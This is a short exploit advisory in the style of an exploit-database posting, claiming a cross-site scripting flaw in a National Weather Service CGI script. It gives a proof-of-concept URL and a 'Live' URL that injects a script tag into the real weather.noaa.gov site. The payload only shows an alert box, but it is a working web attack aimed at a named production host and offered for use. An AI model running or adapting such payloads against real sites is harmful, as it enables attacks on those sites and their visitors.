##################################################
# Exploit Title: National Weather Service( Internet Weather Source) <= XSS Vulnerability
# Date: 17/12/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# 3Mail: ryuzaki_l@y7mail.com
# Category: webapps
# Google dork: -
# Tested on: Linux
##################################################

+---------------------------------------------------+
[~]Exploit/p0c :

http://localhost/path/nwsexit.pl?url=[XSS]

[~] Live
http://weather.noaa.gov/cgi-bin/nwsexit.pl?url="><script>alert("XSS")</script>

+---------------------------------------------------+
Greetz to : ./CyberSEC